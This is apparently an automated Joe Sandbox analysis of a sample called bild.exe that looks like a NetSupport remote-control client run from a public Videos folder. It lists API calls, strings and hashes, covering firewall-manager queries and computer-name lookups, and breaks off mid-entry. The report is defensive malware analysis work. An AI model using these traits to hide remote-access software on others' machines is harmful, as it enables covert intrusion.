                                                                                    • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                    • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                    • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                    • API String ID: 3222248624-258972079
                                                                                    • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                    • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                    • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                    • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                    • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                    • API String ID: 4186647306-532032230
                                                                                    • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                    • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                    • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                    • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                    • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                    • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                    • API String ID: 3360349984-1136101629
                                                                                    • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                    • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                    • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                    • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                    APIs
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: %s%s%s.bin$364339$_HF$_HW$_SW
                                                                                    • API String ID: 2111968516-754603740
                                                                                    • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                    • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                    • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                    • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                    APIs
                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                    • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                    • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                    • String ID: NSMDesktopWnd
                                                                                    • API String ID: 2669163067-206650970
                                                                                    • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                    • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                    • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                    • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                    APIs
                                                                                    • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                    • KillTimer.USER32(00000000,00007F5E,TermUI...), ref: 1113CCB3
                                                                                    • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                    • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeKillLibraryTimer
                                                                                    • String ID: TermUI
                                                                                    • API String ID: 2006562601-4085834059
                                                                                    • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                    • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                    • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                    • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                    APIs
                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                    • API String ID: 47109696-3245241687
                                                                                    • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                    • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                    • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                    • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                    APIs
                                                                                      • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                      • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                      • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                    • API String ID: 806825551-1858614750
                                                                                    • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                    • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                    • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                    • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                    APIs
                                                                                      • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                    • ResetEvent.KERNEL32(00000104), ref: 11144269
                                                                                    • SetEvent.KERNEL32(00000104), ref: 1114427F
                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                    • String ID: MiniDump
                                                                                    • API String ID: 1494854734-2840755058
                                                                                    • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                    • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                    • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                    • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                    APIs
                                                                                    • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                    • wsprintfA.USER32 ref: 11146E06
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                    • API String ID: 1985783259-2296142801
                                                                                    • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                    • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                    • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                    • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                      • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                      • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                    • wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • _memset.LIBCMT ref: 1110F477
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                    • API String ID: 3234921582-2664294811
                                                                                    • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                    • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                    • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                    • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                    APIs
                                                                                      • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                      • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                    • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                    • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                    • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                    • API String ID: 1108920153-1959555903
                                                                                    • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                    • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                    • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                    • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 11031926
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                    • String ID: %s%s.bin$364339$clientinv.cpp$m_pDoInv == NULL
                                                                                    • API String ID: 4180936305-437556765
                                                                                    • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                    • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                    • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                    • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                    • __strdup.LIBCMT ref: 111446A7
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                    • _free.LIBCMT ref: 111446DC
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
